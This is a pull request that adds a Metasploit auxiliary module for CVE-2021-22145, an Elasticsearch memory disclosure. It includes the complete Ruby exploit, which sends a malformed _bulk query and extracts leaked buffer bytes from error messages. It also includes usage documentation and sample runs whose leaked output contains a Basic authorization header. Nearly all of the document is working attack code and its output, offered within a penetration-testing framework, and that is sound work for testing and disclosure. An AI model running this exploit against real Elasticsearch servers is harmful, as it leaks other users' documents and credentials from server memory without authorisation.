### PR TITLE
Elasticsearch Memory Disclosure (CVE-2021-22145)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.md
+++ b/documentation/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.md
@@ -61,8 +61,8 @@ msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set leak_count 2
 leak_count => 2
 msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > run
 
-[*] Leaking heartbeat response #1
-[*] Leaking heartbeat response #2
+[*] Leaking response #1
+[*] Leaking response #2
 [+] Leaked 2106 bytes
 [*] Printable info leaked:
 HTTP/1.1 200 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@.: 2....@.........................................................................................................................................................................................................................................................."[truncated 1048076 bytes].HTTP/1.1 200 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@.: 2....@.........................................................................................................................................................................................................................................................."[truncated 1048076 bytes]
@@ -77,8 +77,8 @@ msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set action dump
 action => dump
 msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > run
 
-[*] Leaking heartbeat response #1
-[*] Leaking heartbeat response #2
+[*] Leaking response #1
+[*] Leaking response #2
 [+] Leaked 2088 bytes
 [+] Elasticsearch memory data stored in /root/.msf4/loot/20230825124508_default_127.0.0.1_elasticsearch.me_033879.bin
 [*] Printable info leaked:

--- a/documentation/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.md
+++ b/documentation/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.md
@@ -1,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a memory disclosure vulnerability in Elasticsearch
+7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary
+queries to Elasticsearch can generate an error message containing previously
+used portions of a data buffer.
+This buffer could contain sensitive information such as Elasticsearch
+documents or authentication details. This vulnerability's output is similar
+to heartbleed.
+
+### Docker Install
+
+`docker run -p 9200:9200 -e "discovery.type=single-node" elasticsearch:7.13.2`
+
+This will start a docker instance, however it will most likely on return
+back empty memory data, or your own query. Running the
+`elasticsearch_enum` module with good or bad credentials will generate
+more interesting data.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/elasticsearch_memory_disclosure`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get a dump of memory.
+
+## Actions
+
+### SCAN
+
+This action will dump the memory and print the leaked bytes count. Set `verbose`
+to true to view the data. Default
+
+### DUMP
+
+This action will dump the memory and print the leaked bytes count. Set `verbose`
+to true to view the data. The output is then stored as loot.
+
+## Options
+
+### LEAK_COUNT
+
+How many times to run the memory dumper. Defaults to `1`
+
+## Scenarios
+
+### Elasticsearch 7.13.2 on Docker
+
+The module is run with action `SCAN`, and `leak_count` set to `2` to have a better chance
+of leaking interesting information.
+
+```
+msf6 > use auxiliary/scanner/http/elasticsearch_memory_disclosure
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set leak_count 2
+leak_count => 2
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > run
+
+[*] Leaking heartbeat response #1
+[*] Leaking heartbeat response #2
+[+] Leaked 2106 bytes
+[*] Printable info leaked:
+HTTP/1.1 200 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@.: 2....@.........................................................................................................................................................................................................................................................."[truncated 1048076 bytes].HTTP/1.1 200 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@.: 2....@.........................................................................................................................................................................................................................................................."[truncated 1048076 bytes]
+..�aT�!...00 Internal Server Error....User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0..Authorization: Basic YWRtaW46MTIzNDU2.........................................................................................х���...00 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@..."[truncated 1048076 bytes]...�aT�!...00 Internal Server Error....User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0..Authorization: Basic YWRtaW46MTIzNDU2.........................................................................................х���...00 OK..rnal Server Error..1:9200..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51..Content-Type: application/json..Content-Length: 2....@..."[truncated 1048076 bytes]
+[*] Auxiliary module execution completed
+```
+
+In this example, we set the action to `DUMP` to store the data as well.
+
+```
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > set action dump
+action => dump
+msf6 auxiliary(scanner/http/elasticsearch_memory_disclosure) > run
+
+[*] Leaking heartbeat response #1
+[*] Leaking heartbeat response #2
+[+] Leaked 2088 bytes
+[+] Elasticsearch memory data stored in /root/.msf4/loot/20230825124508_default_127.0.0.1_elasticsearch.me_033879.bin
+[*] Printable info leaked:
+HTTP/1.1 400 Bad Request..: 127.0.0.1:9200..User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0..Content-Type: application/json..Content-Length: 2....@................................................................................................................................................................................................................................................................................................................."[truncated 1048076 bytes].HTTP/1.1 400 Bad Request..: 127.0.0.1:9200..User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0..Content-Type: application/json..Content-Length: 2....@................................................................................................................................................................................................................................................................................................................."[truncated 1048076 bytes].�........l�Kn�0.D.��\�`%�&"Q�H�M�.�.�Pd��p0�O���Q.�B�.R�'j/w.������ڈāq�.�[8.��� ��yC]@j"Ͼ�,�� 0...�.�3�-��<��.H�\#.�:�X�.3.��]P�W�uCG��gG��c�N�.��z��y8.X2���B.�����.|���C.�w�.�s�'O��Z$1@�[���<.��?...��nyone. See https://www.elastic.co/guide/en/elasticsearch/reference/7.13/security-minimal-setup.html to enable security."..content-type: application/json; charset=UTF-8..content-encoding: gzip..: none..Sec-Fetch-Mode: cors..Sec-Fetch-Dest: empty..Accept-Encoding: gzip, deflate, br..Accept"[truncated 1048076 bytes]..�........l�Kn�0.D.��\�`%�&"Q�H�M�.�.�Pd��p0�O���Q.�B�.R�'j/w.������ڈāq�.�[8.��� ��yC]@j"Ͼ�,�� 0...�.�3�-��<��.H�\#.�:�X�.3.��]P�W�uCG��gG��c�N�.��z��y8.X2���B.�����.|���C.�w�.�s�'O��Z$1@�[���<.��?...��nyone. See https://www.elastic.co/guide/en/elasticsearch/reference/7.13/security-minimal-setup.html to enable security."..content-type: application/json; charset=UTF-8..content-encoding: gzip..: none..Sec-Fetch-Mode: cors..Sec-Fetch-Dest: empty..Accept-Encoding: gzip, deflate, br..Accept"[truncated 1048076 bytes]
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.rb
+++ b/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.rb
@@ -1,0 +1,188 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  DEDUP_REPEATED_CHARS_THRESHOLD = 400
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Elasticsearch Memory Disclosure',
+        'Description' => %q{
+          This module exploits a memory disclosure vulnerability in Elasticsearch
+          7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary
+          queries to Elasticsearch can generate an error message containing previously
+          used portions of a data buffer.
+          This buffer could contain sensitive information such as Elasticsearch
+          documents or authentication details. This vulnerability's output is similar
+          to heartbleed.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Eric Howard', # discovery
+          'R0NY' # edb exploit
+        ],
+        'References' => [
+          ['EDB', '50149'],
+          ['CVE', '2021-22145'],
+          ['URL', 'https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177']
+        ],
+        'DisclosureDate' => '2021-07-21',
+        'Actions' => [
+          ['SCAN', { 'Description' => 'Check hosts for vulnerability' }],
+          ['DUMP', { 'Description' => 'Dump memory contents to loot' }],
+        ],
+        'DefaultAction' => 'SCAN',
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [] # nothing in the docker logs anyways
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(9200),
+        OptString.new('USERNAME', [ false, 'User to login with', '']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        OptString.new('TARGETURI', [ true, 'The URI of the Elastic Application', '/']),
+        OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])
+      ]
+    )
+  end
+
+  def get_version
+    vprint_status('Querying version information...')
+    request = {
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    }
+    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if !datastore['USERNAME'].blank? || !datastore['PASSWORD'].blank?
+
+    res = send_request_cgi(request)
+
+    return nil if res.nil?
+    return nil if res.code == 401
+
+    if res.code == 200 && !res.body.empty?
+      json_body = res.get_json_document
+      if json_body.empty?
+        vprint_error('Unable to parse JSON')
+        return
+      end
+    end
+
+    json_body.dig('version', 'number')
+  end
+
+  def check_host(_ip)
+    version = get_version
+    return CheckCode::Unknown("#{peer} - Could not connect to web service, or unexpected response") if version.nil?
+
+    if Rex::Version.new(version) <= Rex::Version.new('7.13.3') && Rex::Version.new(version) >= Rex::Version.new('7.10.0')
+      return Exploit::CheckCode::Appears("Exploitable Version Detected: #{version}")
+    end
+
+    Exploit::CheckCode::Safe("Unexploitable Version Detected: #{version}")
+  end
+
+  def leak_count
+    datastore['LEAK_COUNT']
+  end
+
+  # Stores received data
+  def loot_and_report(data)
+    if data.to_s.empty?
+      vprint_error("Looks like there isn't leaked information...")
+      return
+    end
+
+    print_good("Leaked #{data.length} bytes")
+    report_vuln({
+      host: rhost,
+      port: rport,
+      name: name,
+      refs: references,
+      info: "Module #{fullname} successfully leaked info"
+    })
+
+    if action.name == 'DUMP' # Check mode, dump if requested.
+      path = store_loot(
+        'elasticsearch.memory.disclosure',
+        'application/octet-stream',
+        rhost,
+        data,
+        nil,
+        'Elasticsearch server memory'
+      )
+      print_good("Elasticsearch memory data stored in #{path}")
+    end
+
+    # Convert non-printable characters to periods
+    printable_data = data.gsub(/[^[:print:]]/, '.')
+
+    # Keep this many duplicates as padding around the deduplication message
+    duplicate_pad = (DEDUP_REPEATED_CHARS_THRESHOLD / 3).round
+
+    # Remove duplicate characters
+    abbreviated_data = printable_data.gsub(/(.)\1{#{(DEDUP_REPEATED_CHARS_THRESHOLD - 1)},}/) do |s|
+      s[0, duplicate_pad] +
+        ' repeated ' + (s.length - (2 * duplicate_pad)).to_s + ' times ' +
+        s[-duplicate_pad, duplicate_pad]
+    end
+
+    # Show abbreviated data
+    vprint_status("Printable info leaked:\n#{abbreviated_data}")
+  end
+
+  def bleed
+    request = {
+      'uri' => normalize_uri(target_uri.path, '_bulk'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => "@\n"
+    }
+    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if !datastore['USERNAME'].blank? || !datastore['PASSWORD'].blank?
+
+    res = send_request_cgi(request)
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 400
+
+    json_body = res.get_json_document
+    if json_body.empty?
+      vprint_error('Unable to parse JSON')
+      return
+    end
+    leak1 = json_body.dig('error', 'root_cause')
+    return if leak1.nil? || leak1.empty?
+
+    leak1 = leak1[0]['reason']
+    return if leak1.nil?
+
+    leak1 = leak1.split('(byte[])"')[1].split('; line')[0]
+
+    leak2 = json_body.dig('error', 'reason')
+    return if leak2.nil?
+
+    leak2 = leak2.split('(byte[])"')[1].split('; line')[0]
+
+    "#{leak1}\n#{leak2}"
+  end
+
+  def run
+    bleeded = ''
+    1.upto(leak_count) do |count|
+      vprint_status("Leaking heartbeat response ##{count}")
+      bleeded << bleed
+    end
+    loot_and_report(bleeded)
+  end
+end

--- a/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.rb
+++ b/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
       'uri' => normalize_uri(target_uri.path),
       'method' => 'GET'
     }
-    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if !datastore['USERNAME'].blank? || !datastore['PASSWORD'].blank?
+    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? || datastore['PASSWORD'].present?
 
     res = send_request_cgi(request)
 
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Auxiliary
       'ctype' => 'application/json',
       'data' => "@\n"
     }
-    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if !datastore['USERNAME'].blank? || !datastore['PASSWORD'].blank?
+    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? || datastore['PASSWORD'].present?
 
     res = send_request_cgi(request)
 
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
     leak1 = json_body.dig('error', 'root_cause')
-    return if leak1.nil? || leak1.empty?
+    return if leak1.blank?
 
     leak1 = leak1[0]['reason']
     return if leak1.nil?
@@ -178,11 +178,11 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    bleeded = ''
+    memory = ''
     1.upto(leak_count) do |count|
-      vprint_status("Leaking heartbeat response ##{count}")
-      bleeded << bleed
+      vprint_status("Leaking response ##{count}")
+      memory << bleed
     end
-    loot_and_report(bleeded)
+    loot_and_report(memory)
   end
 end


### PR DESCRIPTION
This PR adds an aux scanner to exploit CVE-2021-22145, a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive).  Send ES a malformed query, and the error JSON includes memory bytes, yes that simple.

I took a lot of code from the heartbleed module since they're somewhat similar in output, and that module was done really well.

## Verification

- [ ] install the vuln docker image
- [ ] generate a bunch of traffic to the docker image so it dumps something interesting
- [ ] Start `msfconsole`
- [ ] Do: `use auxiliary/scanner/http/elasticsearch_memory_disclosure`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `run`
- [ ] **Verify** You should get a dump of memory.
